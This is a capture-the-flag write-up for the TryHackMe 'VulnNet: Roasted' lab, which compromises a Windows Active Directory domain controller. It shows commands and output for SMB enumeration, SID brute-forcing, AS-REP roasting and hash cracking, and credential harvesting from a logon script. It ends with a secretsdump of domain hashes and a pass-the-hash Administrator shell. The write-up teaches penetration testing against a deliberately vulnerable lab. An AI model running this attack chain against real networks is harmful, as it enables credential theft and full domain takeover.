- URL: https://tryhackme.com/room/vulnnetroasted
- Target OS: Windows
- Rated Difficulty: Easy
DESCRIPTION
VulnNet Entertainment just deployed a new instance on their network with the newly-hired system administrators. Being a security-aware company, they as always hired you to perform a penetration test, and see how system administrators are performing.
ENUM >> NMAP
# Nmap 7.92 scan initiated Sun Feb 13 12:01:45 2022 as: nmap -sS -A -p 53,88,135,139,389,445,464,593,636,3268,3269 -oN nmap_agressive 10.10.31.100
Nmap scan report for 10.10.31.100
Host is up (0.39s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-02-13 01:02:54Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: vulnnet-rst.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: vulnnet-rst.local0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: Host: WIN-2BO8M1OE1M1; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 59s
| smb2-time:
| date: 2022-02-13T01:03:28
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
TRACEROUTE (using port 135/tcp)
HOP RTT ADDRESS
1 407.94 ms 10.9.0.1
2 408.00 ms 10.10.31.100
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Feb 13 12:03:16 2022 -- 1 IP address (1 host up) scanned in 91.77 seconds
No web server… just a plain server with default ports… SMB! 😉
ENUM >> SMB shares
- First lets see what shares (if any) we can get to – I included a username but left the password blank as not supplying any username would cause a failure due to lack of access.
❯ smbmap -u stimpz -H 10.10.31.100
[+] Guest session IP: 10.10.31.100:445 Name: vulnnet-rst.local0
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON NO ACCESS Logon server share
SYSVOL NO ACCESS Logon server share
VulnNet-Business-Anonymous READ ONLY VulnNet Business Sharing
VulnNet-Enterprise-Anonymous READ ONLY VulnNet Enterprise Sharing
-
Looks like we have access to two non-default shares,
VulnNet-Business-Anonymous
andVulnNet-Enterprise-Anonymous
. Both shares have 3 text files each: -
VulnNet-Business-Anonymous
:
❯ smbclient \\\\10.10.31.100\\VulnNet-Business-Anonymous
Enter WORKGROUP\stimpz's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Mar 13 13:46:40 2021
.. D 0 Sat Mar 13 13:46:40 2021
Business-Manager.txt A 758 Fri Mar 12 12:24:34 2021
Business-Sections.txt A 654 Fri Mar 12 12:24:34 2021
Business-Tracking.txt A 471 Fri Mar 12 12:24:34 2021
8771839 blocks of size 4096. 4526264 blocks available
VulnNet-Enterprise-Anonymous
:
❯ smbclient \\\\10.10.31.100\\VulnNet-Enterprise-Anonymous
Enter WORKGROUP\stimpz's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Mar 13 13:46:40 2021
.. D 0 Sat Mar 13 13:46:40 2021
Enterprise-Operations.txt A 467 Fri Mar 12 12:24:34 2021
Enterprise-Safety.txt A 503 Fri Mar 12 12:24:34 2021
Enterprise-Sync.txt A 496 Fri Mar 12 12:24:34 2021
8771839 blocks of size 4096. 4522008 blocks available
- Out of the 6 text files, 4 of them had a unique full name mentioned. I ended up dumping their full names into a text file:
Alexa Whitehat
Jack Goldenhand
Tony Skid
Johnny Leet
-
Then, I ran a custom ruleset with John The Ripper that created a userlist from a list of full names, and I also added two known default account names,
Administrator
andkrbtgt
to the top of the file. I strongly suggest checking out Dzmitry Savitski’s blog post for details on how to set up his ruleset, it worked flawlessly and actually was one of the only few that generated the right pattern for this system’s naming convention. -
Finally, I ran Kerbrute against the list and got the following response:
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 02/13/22 - Ronnie Flathers @ropnop
2022/02/13 13:51:29 > Using KDC(s):
2022/02/13 13:51:29 > vulnnet-rst.local:88
2022/02/13 13:51:29 > [+] VALID USERNAME: administrator@vulnnet-rst.local
2022/02/13 13:51:31 > [+] VALID USERNAME: j-goldenhand@vulnnet-rst.local
2022/02/13 13:51:31 > [+] VALID USERNAME: a-whitehat@vulnnet-rst.local
2022/02/13 13:51:31 > [+] VALID USERNAME: t-skid@vulnnet-rst.local
2022/02/13 13:51:31 > [+] VALID USERNAME: j-leet@vulnnet-rst.local
2022/02/13 13:51:33 > Done! Tested 106 usernames (5 valid) in 4.483 seconds
- However… as you will see below, there is a MUCH easier way than taking the whole route as far… which we will use below.
ENUM >> Users to scan against…
- Impacket have a wonderful tool that can be used to rip users and groups named
lookupsid.py
– it rips the list directly via SID bruteforcing… ironically, I tried to do the same method via crackmapexecand even enum4linux but neither worked…:
❯ lookupsid.py anonymous@10.10.158.170 | tee vulnnet_users.txt
Password:
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Brute forcing SIDs at 10.10.158.170
[*] StringBinding ncacn_np:10.10.158.170[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-1589833671-435344116-4136949213
498: VULNNET-RST\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: VULNNET-RST\Administrator (SidTypeUser)
501: VULNNET-RST\Guest (SidTypeUser)
502: VULNNET-RST\krbtgt (SidTypeUser)
512: VULNNET-RST\Domain Admins (SidTypeGroup)
513: VULNNET-RST\Domain Users (SidTypeGroup)
514: VULNNET-RST\Domain Guests (SidTypeGroup)
515: VULNNET-RST\Domain Computers (SidTypeGroup)
516: VULNNET-RST\Domain Controllers (SidTypeGroup)
517: VULNNET-RST\Cert Publishers (SidTypeAlias)
518: VULNNET-RST\Schema Admins (SidTypeGroup)
519: VULNNET-RST\Enterprise Admins (SidTypeGroup)
520: VULNNET-RST\Group Policy Creator Owners (SidTypeGroup)
521: VULNNET-RST\Read-only Domain Controllers (SidTypeGroup)
522: VULNNET-RST\Cloneable Domain Controllers (SidTypeGroup)
525: VULNNET-RST\Protected Users (SidTypeGroup)
526: VULNNET-RST\Key Admins (SidTypeGroup)
527: VULNNET-RST\Enterprise Key Admins (SidTypeGroup)
553: VULNNET-RST\RAS and IAS Servers (SidTypeAlias)
571: VULNNET-RST\Allowed RODC Password Replication Group (SidTypeAlias)
572: VULNNET-RST\Denied RODC Password Replication Group (SidTypeAlias)
1000: VULNNET-RST\WIN-2BO8M1OE1M1$ (SidTypeUser)
1101: VULNNET-RST\DnsAdmins (SidTypeAlias)
1102: VULNNET-RST\DnsUpdateProxy (SidTypeGroup)
1104: VULNNET-RST\enterprise-core-vn (SidTypeUser)
1105: VULNNET-RST\a-whitehat (SidTypeUser)
1109: VULNNET-RST\t-skid (SidTypeUser)
1110: VULNNET-RST\j-goldenhand (SidTypeUser)
1111: VULNNET-RST\j-leet (SidTypeUser)
- Then to grab only the users and drop them in a list, we can use the following command:
❯ grep SidTypeUser vulnnet_users.txt | awk '{print $2}' | cut -d "\\" -f2 > users.txt
- This leaves us with the following userlist:
Administrator
Guest
krbtgt
WIN-2BO8M1OE1M1$
enterprise-core-vn
a-whitehat
t-skid
j-goldenhand
j-leet
ENUM >> Impacket’s GetNPUsers.py
- Let’s throw our newly generated userlist at
GetNPUsers.py
and see what we get:
❯ GetNPUsers.py vulnnet-rst.local/ -dc-ip 10.10.158.170 -no-pass -usersfile users.txt
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Guest doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User WIN-2BO8M1OE1M1$ doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User enterprise-core-vn doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User a-whitehat doesn't have UF_DONT_REQUIRE_PREAUTH set
<REDACTED>
[-] User j-goldenhand doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User j-leet doesn't have UF_DONT_REQUIRE_PREAUTH set
CREDS - t-skid's AS-REP hash
LOOT >> Cracking t-skid‘s AS-REP hash
❯ john --wordlist=/usr/share/wordlists/rockyou.txt t-skid_as-rep.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
<REDACTED> ($krb5asrep$23$t-skid@VULNNET-RST.LOCAL)
1g 0:00:00:04 DONE (2022-02-13 14:56) 0.2358g/s 749645p/s 749645c/s 749645C/s tjalling..tj0216044
Use the "--show" option to display all of the cracked passwords reliably
Session completed
CREDS - t-skid
ENUM >> More SMB… with a user this time!
- Using
t-skid
s credentials we get a few more open shares…NETLOGON
andSYSVOL
:
✖ smbmap -u t-skid -p <REDACTED> -H 10.10.158.170
[+] IP: 10.10.158.170:445 Name: vulnnet-rst.local
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
VulnNet-Business-Anonymous READ ONLY VulnNet Business Sharing
VulnNet-Enterprise-Anonymous READ ONLY VulnNet Enterprise Sharing
- If we do a recursive scan on the
NETLOGON
share we see a file titledResetPassword.vbs
❯ smbmap -u t-skid -p <REDACTED> -H 10.10.158.170 -R 'NETLOGON'
[+] IP: 10.10.158.170:445 Name: vulnnet-rst.local
Disk Permissions Comment
---- ----------- -------
NETLOGON READ ONLY
.\NETLOGON\*
dr--r--r-- 0 Wed Mar 17 10:15:49 2021 .
dr--r--r-- 0 Wed Mar 17 10:15:49 2021 ..
fr--r--r-- 2821 Wed Mar 17 10:18:14 2021 ResetPassword.vbs
LOOT >> More creds from ResetPassword.vbs
- Inside
ResetPassword.vbs
we have 2 very interesting lines:
strUserNTName = "<REDACTED>"
strPassword = "<REDACTED>"
CREDS - a-whitehat
- Let’s see what smbmap comes back with when we try them:
❯ smbmap -u a-whitehat -p <REDACTED> -H 10.10.158.170
[+] IP: 10.10.158.170:445 Name: vulnnet-rst.local
[-] Work[!] Unable to remove test directory at \\10.10.158.170\SYSVOL\CSTFIGYZGM, please remove manually
Disk Permissions Comment
---- ----------- -------
ADMIN$ READ, WRITE Remote Admin
C$ READ, WRITE Default share
IPC$ READ ONLY Remote IPC
NETLOGON READ, WRITE Logon server share
SYSVOL READ, WRITE Logon server share
VulnNet-Business-Anonymous READ ONLY VulnNet Business Sharing
VulnNet-Enterprise-Anonymous READ ONLY VulnNet Enterprise Sharing
- Now we are definitely getting somewhere… R/W access on
ADMIN$
means we have some serious privs now! 😉
PRIVESC >> a-whitehat has WinRM access!
❯ evil-winrm -i vulnnet-rst.local -u a-whitehat -p <REDACTED>
Evil-WinRM shell v3.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\a-whitehat\Documents>
- Hooray! Shell access to a user that has elevated privileges! We can hopefully do a
secretsdump
on the DC at this height. First thing’s first though…
LOOT >> user.txt
*Evil-WinRM* PS C:\Users\a-whitehat\Desktop> ls
*Evil-WinRM* PS C:\Users\a-whitehat\Desktop> Get-ChildItem -Path C:\Users\ -Recurse -Include user.txt
Directory: C:\Users\enterprise-core-vn\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/13/2021 3:43 PM 39 user.txt
*Evil-WinRM* PS C:\Users\a-whitehat\Desktop> cat C:\Users\enterprise-core-vn\Desktop\user.txt
<REDACTED>
FLAG - user.txt
ENUM >> secretsdump using a-whitehat’s credentials
a-whitehat
brings the goods! 😉
❯ secretsdump.py 'vulnnet-rst.local/a-whitehat:<REDACTED>@10.10.219.71'
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Target system bootKey: 0xf10a2788aef5f622149a41b2c745f49a
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
<REDACTED>
[*] Cleaning up...
CREDS - VulnNet - Roasted DC hash dump
- Awesome! Now that we have the
Administrator
NTLM hash… can we use it to login via WinRM?
❯ evil-winrm -i vulnnet-rst.local -u Administrator -H <REDACTED>
Evil-WinRM shell v3.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
vulnnet-rst\administrator
LOOT >> system.txt
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat system.txt
<REDACTED>